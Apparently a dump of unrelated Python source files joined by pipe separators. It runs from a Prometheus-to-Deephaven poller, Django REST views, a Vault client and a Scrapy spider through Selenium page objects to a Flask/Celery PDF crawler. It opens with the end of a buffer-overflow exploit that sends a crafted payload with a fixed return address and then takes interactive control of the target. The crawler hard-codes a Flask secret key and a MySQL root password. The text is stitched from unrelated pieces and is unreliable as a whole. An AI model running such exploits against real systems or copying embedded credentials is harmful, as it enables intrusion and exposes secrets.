bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x3c)
bof_payload.set_ret(0x8049256)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Hand control of the process's stdin/stdout over to the user.
target.interactive()
# +------------------------------------------------+
# | Artist: Slipknot |
# +------------------------------------------------+
# | Song: Duality |
# +------------------------------------------------+
# | I push my fingers into my |
# +------------------------------------------------+
|
"""
prometheus.py
A simple python script that pulls data from Prometheus's API, and
stores it in a Deephaven table.
This is expected to be run within Deephaven's application mode https://deephaven.io/core/docs/how-to-guides/app-mode/.
After launching, there will be 2 tables within the "Panels" section of the Deephaven UI.
One will be a static table and the other will be continually updating with real data.
@author Jake Mulford
@copyright Deephaven Data Labs LLC
"""
from deephaven.TableTools import newTable, stringCol, dateTimeCol, doubleCol
from deephaven import DynamicTableWriter
from deephaven.DBTimeUtils import millisToTime
import deephaven.Types as dht
from typing import Callable
import requests
import threading
import time
PROMETHEUS_QUERIES = ["up", "go_memstats_alloc_bytes"] #Edit this and add your queries here
BASE_URL = "{base}/api/v1/query".format(base="http://prometheus:9090") #Edit this to your base URL if you're not using a local Prometheus instance
# Java class handle resolved through Deephaven's embedded jpy bridge.
ApplicationState = jpy.get_type("io.deephaven.appmode.ApplicationState")
def make_prometheus_request(prometheus_query, query_url):
    """
    Execute *prometheus_query* against the Prometheus instant-query API and
    flatten the vector response for storage in a Deephaven table.

    Assumes the query returns a "vector" result type:
    https://prometheus.io/docs/prometheus/latest/querying/api/#instant-vectors

    Args:
        prometheus_query (str): The Prometheus query to execute.
        query_url (str): The URL of the query endpoint.

    Returns:
        list[(date-time, str, str, float)]: (timestamp, job, instance, value)
        tuples; empty when the response has no vector data.
    """
    rows = []
    payload = requests.get(query_url, params={"query": prometheus_query}).json()
    if "data" in payload.keys():
        data = payload["data"]
        if "resultType" in data and data["resultType"] == "vector":
            for entry in data["result"]:
                # Prometheus timestamps are in seconds; millisToTime() wants
                # integer milliseconds, hence the *1000 and int() cast.
                when = millisToTime(int(entry["value"][0] * 1000))
                rows.append((when,
                             entry["metric"]["job"],
                             entry["metric"]["instance"],
                             float(entry["value"][1])))
    return rows
def start_dynamic(app: ApplicationState):
    """
    Deephaven Application Mode method that starts the dynamic data collector.

    Publishes a live table under the field "result_dynamic", then starts a
    background thread that appends one row per Prometheus result roughly
    every 2 seconds, forever.
    """
    column_names = ["DateTime", "PrometheusQuery", "Job", "Instance", "Value"]
    column_types = [dht.datetime, dht.string, dht.string, dht.string, dht.double]
    table_writer = DynamicTableWriter(
        column_names,
        column_types
    )
    result = table_writer.getTable()
    # Infinite polling loop; runs on the thread started below.
    def thread_func():
        while True:
            for prometheus_query in PROMETHEUS_QUERIES:
                values = make_prometheus_request(prometheus_query, BASE_URL)
                for (date_time, job, instance, value) in values:
                    table_writer.logRow(date_time, prometheus_query, job, instance, value)
            time.sleep(2)
    # Expose the table before the writer thread starts filling it.
    app.setField("result_dynamic", result)
    thread = threading.Thread(target = thread_func)
    thread.start()
def start_static(app: ApplicationState, query_count=5):
    """
    Deephaven Application Mode method that starts the static data collector.
    query_count sets the number of requests to make. It is recommended to keep this number low,
    since it delays how long the Deephaven UI takes to become accessible.

    Publishes the resulting snapshot table under the field "result_static".
    """
    # Parallel column lists; one entry per Prometheus result row.
    date_time_list = []
    prometheus_query_list = []
    job_list = []
    instance_list = []
    value_list = []
    for i in range(query_count):
        for prometheus_query in PROMETHEUS_QUERIES:
            values = make_prometheus_request(prometheus_query, BASE_URL)
            for (date_time, job, instance, value) in values:
                date_time_list.append(date_time)
                prometheus_query_list.append(prometheus_query)
                job_list.append(job)
                instance_list.append(instance)
                value_list.append(value)
        # Space samples 2s apart (and avoid hammering the Prometheus server).
        time.sleep(2)
    result = newTable(
        dateTimeCol("DateTime", date_time_list),
        stringCol("PrometheusQuery", prometheus_query_list),
        stringCol("Job", job_list),
        stringCol("Instance", instance_list),
        doubleCol("Value", value_list)
    )
    app.setField("result_static", result)
def update(app: ApplicationState):
    """
    Deephaven Application Mode method that does various updates on the initial tables.
    You can throw any Deephaven Query in here. The ones in here are simply examples.

    Requires both "result_static" and "result_dynamic" fields to already exist.
    """
    #Get the tables from the app
    result_static = app.getField("result_static").value()
    result_dynamic = app.getField("result_dynamic").value()
    #Perform the desired queries, and set the results as new fields
    result_static_update = result_static.by("PrometheusQuery")
    app.setField("result_static_update", result_static_update)
    result_static_average = result_static.dropColumns("DateTime", "Job", "Instance").avgBy("PrometheusQuery")
    app.setField("result_static_average", result_static_average)
    result_dynamic_update = result_dynamic.by("PrometheusQuery")
    app.setField("result_dynamic_update", result_dynamic_update)
    result_dynamic_average = result_dynamic.dropColumns("DateTime", "Job", "Instance").avgBy("PrometheusQuery")
    app.setField("result_dynamic_average", result_dynamic_average)
def initialize(func: Callable[[ApplicationState], None]):
    """
    Deephaven Application Mode initialization helper: fetch the current
    application context and invoke *func* on it.
    """
    context = jpy.get_type("io.deephaven.appmode.ApplicationContext").get()
    func(context)
#Start the static and dynamic data collectors
initialize(start_static)
initialize(start_dynamic)
#Run the table updates (both collector fields must be set before this runs)
initialize(update)
|
from rest_framework import viewsets
from rest_framework.response import Response
from ..serializers import TrailSectionsSerializer
from trail_mapper.models import TrailSections, Trail
class TrailSectionsViewSet(viewsets.ModelViewSet):
    """This is the m2m join of trails and trail_sections."""
    queryset = TrailSections.objects.all()
    serializer_class = TrailSectionsSerializer
    lookup_field = 'guid'

    def list(self, request, *args, **kwargs):
        """Return every trail together with the guids of its sections."""
        # Recreate the queryset here so the listing reflects current data.
        all_sections = TrailSections.objects.all()
        trails = [
            {
                'trail_guid': trail.guid,
                'trail_section_guids': [
                    section.trail_section.guid
                    for section in all_sections.filter(trail__guid=trail.guid)
                ],
            }
            for trail in Trail.objects.all()
        ]
        return Response({"trails_with_sections": trails})
|
from pathlib import Path
import os
import argparse
import pandas as pd
# Destination root for per-group/per-subject folders; None when the
# FREESURFER_DST environment variable is unset.
DST_DIR = os.environ.get('FREESURFER_DST')
def parse():
    """Parse command-line arguments (-d/--dir: csv directory name)."""
    argument_parser = argparse.ArgumentParser()
    argument_parser.add_argument('-d', '--dir')
    parsed = argument_parser.parse_args()
    return parsed
def main():
    """Create <DST_DIR>/<Group>/<Subject> directories for every csv in --dir.

    Reads each csv file in the given directory (resolved relative to this
    script) and ensures a destination folder exists for every
    (Group, Subject) row.

    Raises:
        RuntimeError: when the FREESURFER_DST environment variable is unset.
    """
    args = parse()
    if DST_DIR is None:
        # Fail early with a clear message instead of Path(None) raising
        # an opaque TypeError below.
        raise RuntimeError('FREESURFER_DST environment variable is not set')
    csv_dir = Path(__file__).resolve().parent / args.dir
    for csv in csv_dir.glob('*.csv'):
        df = pd.read_csv(csv.resolve())
        for label, subject in zip(df['Group'], df['Subject']):
            target = Path(DST_DIR) / label / subject
            # Bug fix: the original bare mkdir() failed whenever the <label>
            # level did not exist yet; parents=True creates it, and
            # exist_ok=True replaces the race-prone exists() pre-check.
            target.mkdir(parents=True, exist_ok=True)


if __name__ == '__main__':
    main()
|
import django_filters
from django_filters import CharFilter
from cashPayment.models import cashPayment
class CashFilter(django_filters.FilterSet):
    """FilterSet for cashPayment rows: exact Year, substring Month."""
    # icontains: case-insensitive "contains" lookup on the Month field.
    Month = CharFilter(field_name='Month', lookup_expr='icontains')
    class Meta:
        model = cashPayment
        fields = ['Year', 'Month']
import os
import hvac
from hvac.exceptions import InvalidPath
from requests.exceptions import ConnectionError
from django.conf import settings
from .models import Vault
class VaultClient():
    """
    Thin wrapper around an hvac (HashiCorp Vault) client.

    Ensures a KV version-1 secrets engine is mounted at *mount_point* and
    exposes read/write/delete plus response-wrapping helpers scoped to it.
    """
    # NOTE: the default mount_point is evaluated once at import time, so
    # changing VAULT_MOUNT_POINT afterwards has no effect on new instances.
    def __init__(self, mount_point=os.environ.get('VAULT_MOUNT_POINT', 'pwdmng/')):
        path_prefix = self._path_prefix = mount_point
        self._client = client = hvac.Client(url=settings.VAULT_HOST, token=settings.VAULT_TOKEN)
        try:
            #assert client.is_authenticated() # => True
            engines = client.list_secret_backends()
            # Mount a KV v1 engine at the prefix when it is not mounted yet.
            if engines.get(path_prefix) == None:
                client.enable_secret_backend('kv', mount_point=path_prefix, options={'version': '1'})
            client.kv.default_kv_version = "1"
        except ConnectionError as err:
            # Best effort: keep the object constructible even when Vault is
            # unreachable; later calls fail on the `client` property assert.
            print("VaultClient error: {0}".format(err))
            pass
    @property
    def client(self):
        # Every operation goes through here, guaranteeing an authenticated client.
        assert self._client.is_authenticated()
        return self._client
    def delete(self, path):
        """Delete the secret stored at *path* under this mount."""
        self.client.kv.delete_secret(mount_point=self._path_prefix, path=path)
    def write(self, path, **kargs):
        """Create or overwrite the secret at *path* with **kargs as its data."""
        self.client.kv.create_or_update_secret(mount_point=self._path_prefix, path=path, secret=kargs)
        #self.client.write(self._path_prefix + path, **kargs)
    def read(self, path):
        """Return the secret response at *path*, or None when it does not exist."""
        data = None
        try:
            data = self.client.kv.read_secret(mount_point=self._path_prefix, path=path)
        except InvalidPath:
            pass
        return data
    def wrap(self, data):
        """Response-wrap *data*, returning a wrapping token payload (30m TTL)."""
        response = self._client.adapter.post('/v1/sys/wrapping/wrap', json=data, headers={'X-Vault-Wrap-TTL': '30m'})
        return response.json()
    def unwrap(self, token):
        """Unwrap a wrapping *token* and return the original payload."""
        response = self._client.adapter.post('/v1/sys/wrapping/unwrap', json={'token': token})
        return response.json()
    def get_vault_or_create(self, user):
        """Return the user's first Vault record, creating one when absent."""
        vaults = Vault.objects.filter(owner=user)
        vault = vaults[0] if vaults else Vault.objects.create(owner=user)
        return vault
print('yes')
print('whats')
print('eat gulabjamun')
print('switzerland trip to parents in 2023')
# input() returns a string, so the original `work == 1` (str vs int)
# could never be true; compare against the string '1' instead.
work = input()
if work == '1':
    print('earn now')
import scrapy
class DmozSpider(scrapy.Spider):
    """Spider that fetches the first start URL with browser-like headers
    and dumps the raw response body to a local .html file."""
    name = "dmoz"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
        "Upgrade-Insecure-Requests": "1",
    }
    allowed_domains = ["sogou.com", "tmall.com"]
    start_urls = [
        #"https://123.sogou.com/",
        "https://www.tmall.com"
    ]

    def start_requests(self):
        """Issue the initial request using the custom headers."""
        initial_request = scrapy.Request(url=self.start_urls[0],
                                         headers=self.headers,
                                         callback=self.parse)
        yield initial_request

    def parse(self, response):
        """Save the response body as '<second-to-last URL segment>.html'."""
        output_name = response.url.split("/")[-2] + '.html'
        with open(output_name, 'wb') as output_file:
            output_file.write(response.body)
"""Implementing Report screen page objects"""
from TestFramework.Libraries.Pages.base_page import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
class ReportPage(BasePage):
    """
    Page object for the Report screen.

    Exposes locators for the report UI plus helpers to: switch to / close
    the report window, read its title, drive the administrative reports
    tree (Account List and Unified Number Plan reports), fill in report
    parameters, submit them, and verify values on the generated report.
    """
    # Start: Report page locators
    list_frame_locator = (By.NAME, "List")
    detail_frame_locator = (By.NAME, "Detail")
    header_frame_locator = (By.NAME, "Header")
    administrative_reports_plus_button_locator = (By.ID, "IMGReportTree2_ReportGroup21")
    account_list_link_locator = (By.ID, "ReportTree2_ReportGroup21__tlrReport1__Report")
    submit_button_locator = (By.ID, "BReport")
    account_label_value_locator = (By.ID, "Account")
    account_textbox_locator = (By.ID, "rAccount_Account")
    exit_button_locator = (By.ID, "C2_mtLogout")
    unp_report_link_locator = (By.ID, "ReportTree2_ReportGroup21__tlrReport24__Report")
    unp_locator = (By.ID, "rUnifiedNumberPlan_Param5imgDown")
    unified_number_plan_type_dropdown_locator = (By.ID, "rIsOpAc_Param9")
    unp_report_page_title_locator = (By.ID, "lgx_ReportParameterTitle")
    unp_submit_button_locator = (By.ID, "lgxReport")
    contract_column_first_value_locator = (By.ID, "cContract_Row1")
    # End: Report page locators
    def switch_to_report(self):
        """
        Switch focus to the report window and accept its SSL certificate.
        :return:
        """
        self.switch_to_window()
        self.accept_ssl_certificate()
    def get_report_page_title(self):
        """
        Return the report page title once the 'List' frame has loaded.
        :return: Report page title
        """
        self.wait().until(EC.presence_of_element_located(self.list_frame_locator), 'list frame not found before specified time')
        return self.page_title()
    def close_report_page(self):
        """
        Close the report browser window and return to the default window.
        :return:
        """
        self.close_browser()
        self.switch_to_default_window()
    def click_administrative_reports_plus_button(self):
        """
        Expand the 'Administrative Reports' node in the report tree.
        :return:
        """
        self.switch_to_frame(self.list_frame_locator)
        self.click_element(self.administrative_reports_plus_button_locator)
        self.switch_to_default_content()
    def click_account_list_link(self):
        """
        Open the 'Account List' report from the report tree.
        :return:
        """
        self.switch_to_frame(self.list_frame_locator)
        self.click_element(self.account_list_link_locator)
        self.switch_to_default_content()
    def click_submit_button(self):
        """
        Submit the report parameters and switch to the result window.
        :return:
        """
        self.switch_to_frame(self.detail_frame_locator)
        self.set_existing_handles()
        self.click_element(self.submit_button_locator)
        self.switch_to_default_content()
        self.switch_to_window()
    def compare_account_label_data(self, carrier_name):
        """
        Check the account label on the report against the expected carrier.
        :param carrier_name: expected account/carrier name
        :return: True/False
        """
        account_label_value_element = self.wait().until(
            EC.presence_of_element_located(self.account_label_value_locator),
            'account label value locator not found before specified time out')
        # Return the comparison directly instead of a status flag.
        return carrier_name == str(account_label_value_element.text)
    def set_account_value(self, account_name):
        """
        Type *account_name* into the Account report parameter field.
        :param account_name:
        :return:
        """
        self.switch_to_frame(self.detail_frame_locator)
        self.set_value_into_input_field(self.account_textbox_locator, account_name)
        self.switch_to_default_content()
    def click_exit_button(self):
        """
        Log out via the header frame and return to the default window.
        :return:
        """
        self.switch_to_frame(self.header_frame_locator)
        self.click_element(self.exit_button_locator)
        self.switch_to_default_window()
    def click_unp_report_link(self):
        """
        Open the Unified Number Plan (UNP) report from the report tree.
        :return:
        """
        self.switch_to_frame(self.list_frame_locator)
        self.click_element(self.unp_report_link_locator)
        self.switch_to_default_content()
    def set_unified_number_plan(self, account_name, trunk_name, call_type):
        """
        Select the UNP template named '<account>_Out_<trunk>_<call_type>'
        from the lookup popup window.
        :param account_name:
        :param trunk_name:
        :param call_type:
        :return:
        """
        self.set_existing_handles()
        self.switch_to_frame(self.detail_frame_locator)
        self.click_element(self.unp_locator)
        self.switch_to_default_content()
        self.switch_to_window()
        template = account_name + "_Out_" + trunk_name + "_" + call_type
        template_locator = (By.XPATH, "//div[@id='tLookupPaging']/descendant::table[@id='tLookup']/descendant::span[text()='%s']" % str(template))
        self.click_element(template_locator)
        self.switch_to_previous_window()
    def set_unified_number_plan_type(self, number_plan_type):
        """
        Select *number_plan_type* in the UNP type dropdown.
        :param number_plan_type:
        :return:
        """
        self.switch_to_frame(self.detail_frame_locator)
        self.select_option(self.unified_number_plan_type_dropdown_locator, number_plan_type)
        # NOTE(review): clicking the title presumably commits the dropdown
        # selection / moves focus off the control — confirm.
        self.click_element(self.unp_report_page_title_locator)
        self.switch_to_default_content()
    def click_unp_submit_button(self):
        """
        Submit the UNP report parameters and switch to the result window.
        :return:
        """
        self.switch_to_frame(self.detail_frame_locator)
        self.set_existing_handles()
        self.click_element(self.unp_submit_button_locator)
        self.switch_to_default_content()
        self.switch_to_window()
    def compare_number_plan_on_report(self, contract_name):
        """
        Check the first Contract column cell on the report against *contract_name*.
        :param contract_name:
        :return: True/False
        """
        # Bug fix: the wait timeout message below was copy-pasted from the
        # account comparison method; it now names the right locator.
        contract_column_first_value_element = self.wait().until(
            EC.presence_of_element_located(self.contract_column_first_value_locator),
            'contract column first value locator not found before specified time out')
        return contract_name == str(contract_column_first_value_element.text)
|
import subprocess
import shlex
import os
import signal
from helper import path_dict, path_number_of_files, pdf_stats, pdf_date_format_to_datetime, dir_size, url_status
import json
from functools import wraps
from urllib.parse import urlparse
from flask import flash, redirect, url_for, Response, send_file, Markup, logging
from flask_mysqldb import MySQL
from wtforms import Form, StringField, IntegerField, PasswordField, validators
from passlib.hash import sha256_crypt
import time
from threading import Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit
from celery import Celery, chord
from requests import post
import tabula
import PyPDF2
import shutil
import requests
# ----------------------------- CONSTANTS -----------------------------------------------------------------------------
# --- TODO has to be changed when deploying ---
# Path to the celery executable inside the deployment virtualenv.
VIRTUALENV_PATH = '/home/yann/bar/virtualenv/bin/celery'
# Maximum number of crawled PDFs handed to the tabula processing stage.
PDF_TO_PROCESS = 100
MAX_CRAWLING_DURATION = 60 * 15 # in seconds
WAIT_AFTER_CRAWLING = 1000 # in milliseconds
SMALL_TABLE_LIMIT = 10 # defines what is considered a small table
MEDIUM_TABLE_LIMIT = 20 # defines what is considered a medium table
# Note that when checking for size folders are not taken into account and thus
# the effective size can be up to 10% higher, also leave enough room for other requests,
# like downloading pdf's from stats page. For those reasons I would not recommend
# using more than 50 % of available disk space.
MB_CRAWL_SIZE = 500
MAX_CRAWL_SIZE = 1024 * 1024 * MB_CRAWL_SIZE # in bytes (500MB)
CRAWL_REPETITION_WARNING_TIME = 7 # in days
MAX_CRAWL_DEPTH = 5
DEFAULT_CRAWL_URL = 'https://www.bit.admin.ch'
# Directory wget downloads into (relative to the app's working directory).
WGET_DATA_PATH = 'data'
BAR_OUT_LOG_PATH = 'log/bar.out.log'
BAR_ERR_LOG_PATH = 'log/bar.err.log'
CELERY_LOG_PATH = 'log/celery.log'
REDIS_LOG_PATH = 'log/redis.log'
FLOWER_LOG_PATH = 'log/flower.log'
WGET_LOG_PATH = 'log/wget.txt'
# Maps a client-requested log name to its on-disk path.
switcher = {
    'bar.out.log': BAR_OUT_LOG_PATH,
    'bar.err.log': BAR_ERR_LOG_PATH,
    'celery.log': CELERY_LOG_PATH,
    'redis.log': REDIS_LOG_PATH,
    'flower.log': FLOWER_LOG_PATH,
    'wget.log': WGET_LOG_PATH,
}
# ----------------------------- APP CONFIG ----------------------------------------------------------------------------
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on installed packages.
async_mode = None
app = Flask(__name__)
#app.debug = True
# NOTE(review): hard-coded secret key — load from environment/config before deploying.
app.secret_key = 'Aj"$7PE#>3AC6W]`STXYLz*[G\gQWA'
# Celery configuration
app.config['CELERY_BROKER_URL'] = 'redis://localhost:6379/0'
app.config['CELERY_RESULT_BACKEND'] = 'redis://localhost:6379/0'
# SocketIO
socketio = SocketIO(app, async_mode=async_mode)
# Lock to limit app to a single user
lock = Lock()
# Initialize Celery
celery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
# Config MySQL
# NOTE(review): hard-coded database credentials — move to environment/config.
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'mountain'
app.config['MYSQL_DB'] = 'bar'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# Init MySQL
mysql = MySQL(app)
# ----------------------------- CELERY TASKS --------------------------------------------------------------------------
# Background task in charge of crawling
@celery.task(bind=True) # time_limit=MAX_CRAWLING_DURATION other possibility
def crawling_task(self, url='', post_url='', domain='',
                  max_crawl_duration=MAX_CRAWLING_DURATION, max_crawl_size=MAX_CRAWL_SIZE,
                  max_crawl_depth=MAX_CRAWL_DEPTH):
    """
    Celery task that runs a recursive `wget` crawl for PDF files.

    Streams wget's stderr to the client via *post_url*, mirrors it into
    WGET_LOG_PATH, and stops when wget finishes, the `timeout` wrapper
    expires, or the crawled directory exceeds *max_crawl_size* bytes.

    :param url: start URL to crawl
    :param post_url: endpoint used to push progress events to the client
    :param domain: folder under WGET_DATA_PATH whose size is monitored
    :param max_crawl_duration: hard wget time limit in seconds (via `timeout`)
    :param max_crawl_size: size threshold in bytes that aborts the crawl
    :param max_crawl_depth: wget recursion depth (-l)
    :return: wget's exit code
    """
    # STEP 1: Start the wget subprocess
    command = shlex.split("timeout %d wget -r -l %d -A pdf %s" % (max_crawl_duration, max_crawl_depth, url,))
    # Note: Consider using --wait flag, takes longer to download but less aggressive crawled server
    # https://www.gnu.org/software/wget/manual/wget.html#Recursive-Download
    # Note: Using timeout is not necessary, but serves as safety, as wget should be used with caution.
    process = subprocess.Popen(command, cwd=WGET_DATA_PATH, stderr=subprocess.PIPE)
    # Set the pid in the state in order to be able to cancel subprocess anytime
    # Note: one could also cancel the celery task which then should kill its subprocess, but again I prefer option one
    self.update_state(state='PROGRESS', meta={'pid': process.pid, })
    # STEP 2: send crawl stderr through WebSocket and save in logfile
    with open(WGET_LOG_PATH, "a") as logfile:
        while True:
            try:
                next_line = process.stderr.readline()
                # Added try/catch after bug that appears when visiting (because of apostrophe "’"):
                # https://www.edi.admin.ch/edi/it/home/fachstellen/ara/domande-e-risposte/Il-SLR-usa-la-definizione-di-antisemitismo-dell%E2%80%99IHRA.html
                # Noticed by Jean-Luc.
                decoded_line = next_line.decode(encoding='utf-8')
                post(post_url, json={'event': 'crawl_update', 'data': decoded_line})
                logfile.write(decoded_line)
            except UnicodeDecodeError as e:
                # Catch Decoding error.
                print("UnicodeDecodeError: " + str(e) + " The bytes trying to get decoded were: " + next_line.hex())
            if process.poll() is not None:
                # Subprocess is finished
                print("Crawling task has successfully terminated.")
                break
            crawled_size = dir_size(WGET_DATA_PATH + "/" + domain)
            if crawled_size is not None and crawled_size > max_crawl_size:
                # Threshold reached
                print("Crawling task terminated, threshold was reached")
                break
    # STEP 3: Kill the subprocess if still alive at this point
    if process.poll() is None:
        os.kill(process.pid, signal.SIGTERM)
    # STEP 4: Return the exit code
    # (stdout was not piped, so `output` is None here; communicate() is
    # mainly used to reap the child process.)
    output = process.communicate()[0]
    exitCode = process.returncode
    # STEP 5: redirect user to crawling end options.
    post(post_url, json={'event': 'redirect', 'data': {'url': '/crawling/autoend'}})
    # TODO consider releasing lock here
    return exitCode
# Background task in charge of performing table detection on a single pdf
@celery.task(bind=True)
def tabula_task(self, file_path='', post_url=''):
    """
    Celery task that extracts table statistics from a single PDF.

    Skips work when the file's URL is already in the Files table; otherwise
    counts pages with PyPDF2, extracts tables with tabula, aggregates row
    counts and size buckets, stores the stats as JSON in the db, and posts
    progress events to *post_url*.

    :param file_path: path of the PDF under WGET_DATA_PATH
    :param post_url: endpoint used to push events to the client
    :return: Files row id (fid) on success, -1 on any failure
    """
    # STEP 0: check if file is already in db
    url = file_path[(len(WGET_DATA_PATH) + 1):]
    try:
        with app.app_context():
            # Create cursor
            cur = mysql.connection.cursor()
            # Get Crawls
            result = cur.execute("""SELECT fid, stats FROM Files WHERE url=%s""", (url,))
            file = cur.fetchone()
            # If there was a result then return stats directly
            # TODO time limit on how long ago pdf was processed?
            if result > 0:
                stats = json.loads(file['stats'])
                # Communicate success to client in a broadcasting manner
                post(post_url, json={'event': 'tabula_success', 'data': {'data': 'Processing time saved, document was '
                                                                                 'already processed '
                                                                                 'at an earlier time: ',
                                     'pages': stats['n_pages'], 'tables': stats['n_tables']}})
                return file['fid']
    except Exception as e:
        # Communicate failure to client
        post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
                                                                     'text': 'PyPDF error on file : ',
                                                                     'trace': str(e)}})
        return -1
    # STEP 1: Otherwise proceed, set all counters to 0
    n_tables = 0
    n_table_rows = 0
    table_sizes = {'small': 0, 'medium': 0, 'large': 0}
    # STEP 2: count total number of pages by reading PDF
    try:
        pdf_file = PyPDF2.PdfFileReader(open(file_path, mode='rb'))
        n_pages = pdf_file.getNumPages()
    except Exception as e:
        # Communicate failure to client
        post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
                                                                     'text': 'PyPDF error on file : ',
                                                                     'trace': str(e)}})
        return -1
    # STEP 3: run TABULA to extract all tables into one pandas data frame
    try:
        df_array = tabula.read_pdf(file_path, pages="all", multiple_tables=True)
    except Exception as e:
        # Communicate failure to client
        post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
                                                                     'text': 'Tabula error on file : ',
                                                                     'trace': str(e)}})
        return -1
    # STEP 4: count number of rows in each data frame
    for df in df_array:
        rows = df.shape[0]
        n_table_rows += rows
        n_tables += 1
        # Add table stats (bucket each table by its row count)
        if rows <= SMALL_TABLE_LIMIT:
            table_sizes['small'] += 1
        elif rows <= MEDIUM_TABLE_LIMIT:
            table_sizes['medium'] += 1
        else:
            table_sizes['large'] += 1
    # STEP 5: save stats as intermediary results in db
    try:
        creation_date = pdf_file.getDocumentInfo()['/CreationDate']
        stats = {'n_pages': n_pages, 'n_tables': n_tables,
                 'n_table_rows': n_table_rows, 'creation_date': creation_date,
                 'table_sizes': table_sizes}
        with app.app_context():
            # Create cursor
            cur = mysql.connection.cursor()
            # Execute query
            cur.execute("""INSERT INTO Files(url, stats) VALUES(%s, %s)""",
                        (url, json.dumps(stats, sort_keys=True, indent=4)))
            # Get ID from inserted row
            insert_id = cur.lastrowid
            # Commit to DB
            mysql.connection.commit()
            # Close connection
            cur.close()
    except Exception as e:
        # Communicate failure to client
        post(post_url, json={'event': 'processing_failure', 'data': {'pdf_name': file_path,
                                                                     'text': 'Cannot save stats of file in db : ',
                                                                     'trace': str(e)}})
        return -1
    # STEP 6: Send success message to client
    post(post_url, json={'event': 'tabula_success', 'data': {'data': 'Tabula PDF success: ',
                                                             'pages': n_pages, 'tables': n_tables}})
    # STEP 7: Return db row id
    return insert_id
# Background task serving as callback to save metadata to db
# NOTE(review): this task shadows the `pdf_stats` helper imported from
# `helper` at the top of the file — consider renaming one of them.
@celery.task(bind=True)
def pdf_stats(self, tabula_list, domain='', url='', crawl_total_time=0, post_url='', processing_start_time=0):
    """
    Celery chord callback that persists crawl-level statistics.

    Builds the crawled directory hierarchy as JSON, counts the downloaded
    PDFs, tallies tabula successes/failures from *tabula_list* (a list of
    Files ids, -1 marking a failed file), writes a Crawls row plus the
    Crawlfiles links, and finally redirects the client to /processing.

    :param tabula_list: results of the tabula_task group (fid or -1 each)
    :param domain: crawled domain (folder name under data/)
    :param url: original crawl start URL
    :param crawl_total_time: crawl duration in seconds
    :param post_url: endpoint used to push events to the client
    :param processing_start_time: time.time() when processing began
    :return: the string 'success'
    """
    with app.app_context():
        # STEP 0: Time keeping
        path = "data/%s" % (domain,)
        # STEP 1: Call Helper function to create Json string
        # https://stackoverflow.com/questions/35959580/non-ascii-file-name-issue-with-os-walk works
        # https://stackoverflow.com/questions/2004137/unicodeencodeerror-on-joining-file-name doesn't work
        hierarchy_dict = path_dict(path) # adding ur does not work as expected either
        hierarchy_json = json.dumps(hierarchy_dict, sort_keys=True, indent=4) #encoding='cp1252' not needed in python3
        # STEP 2: Call helper function to count number of pdf files
        n_files = path_number_of_files(path)
        # STEP 3: Treat result from Tabula tasks
        n_success = 0
        n_errors = 0
        fid_set = set()
        for fid in tabula_list:
            if fid < 0:
                n_errors += 1
            else:
                n_success += 1
                fid_set.add(fid)
        # STEP 4: Save some additional stats
        disk_size = dir_size(WGET_DATA_PATH + "/" + domain)
        # STEP 5: compute final processing time
        processing_total_time = time.time() - processing_start_time
        # STEP 6: Save query in DB
        # Create cursor
        cur = mysql.connection.cursor()
        # Execute query
        cur.execute("""INSERT INTO Crawls(pdf_crawled, pdf_processed, process_errors, domain, disk_size,
                    url, hierarchy, crawl_total_time, proc_total_time)
                    VALUES(%s ,%s, %s, %s, %s, %s, %s, %s, %s)""",
                    (n_files, n_success, n_errors, domain, disk_size, url, hierarchy_json,
                     crawl_total_time, processing_total_time))
        # Commit to DB
        mysql.connection.commit()
        # Get Crawl ID
        cid = cur.lastrowid
        # STEP 7: link all pdf files to this query
        insert_tuples = [(fid, cid) for fid in fid_set]
        cur.executemany("""INSERT INTO Crawlfiles(fid, cid) VALUES (%s, %s)""",
                        insert_tuples)
        # Commit to DB
        mysql.connection.commit()
        # Close connection
        cur.close()
        # STEP 8: Send success message asynchronously to clients
        post(post_url, json={'event': 'redirect', 'data': {'url': '/processing'}})
        return 'success'
# ----------------------------- HELPER FUNCTIONS ----------------------------------------------------------------------
# Wrapper to check if user logged in
def is_logged_in(f):
    """Decorator that only lets logged-in sessions reach the wrapped view.

    Anonymous visitors get a flash warning and a redirect to the login page.
    """
    @wraps(f)
    def guarded(*args, **kwargs):
        # Guard clause: bounce unauthenticated sessions immediately.
        if 'logged_in' not in session:
            flash('Unauthorized, Please login', 'danger')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return guarded
# Ability to stream a template (can be used with python generator, was now replaced by flask-socketio interface)
def stream_template(template_name, **context):
    """Render a Jinja template as an unbuffered stream instead of a string.

    (Kept for reference; live updates now go through flask-socketio.)
    """
    app.update_template_context(context)
    stream = app.jinja_env.get_template(template_name).stream(context)
    stream.disable_buffering()
    return stream
# ----------------------------- APP ROUTES ----------------------------------------------------------------------------
# Crawl from to check user input
class CrawlForm(Form):
    """WTForms form validating the crawl parameters entered on the home page."""
    url = StringField('URL', [validators.Length(min=4, max=300)], default=DEFAULT_CRAWL_URL)
    depth = IntegerField('Max Crawl Depth', [validators.NumberRange(min=1, max=10)], default=MAX_CRAWL_DEPTH)
    # Entered in minutes; converted to seconds when applied.
    time = IntegerField('Max Crawl Duration [Minutes]', [validators.NumberRange(min=1, max=1000)],
                        default=int(MAX_CRAWLING_DURATION / 60))
    size = IntegerField('Max Crawl Size [MBytes]', [validators.NumberRange(min=10, max=1000)], default=MB_CRAWL_SIZE)
    pdf = IntegerField('Max Number of PDF to be processed', [validators.NumberRange(min=0, max=10000)],
                       default=PDF_TO_PROCESS)
# Index
@app.route('/', methods=['GET', 'POST'])
def index():
    """
    Home page: render the crawl form and, on a valid POST, update the
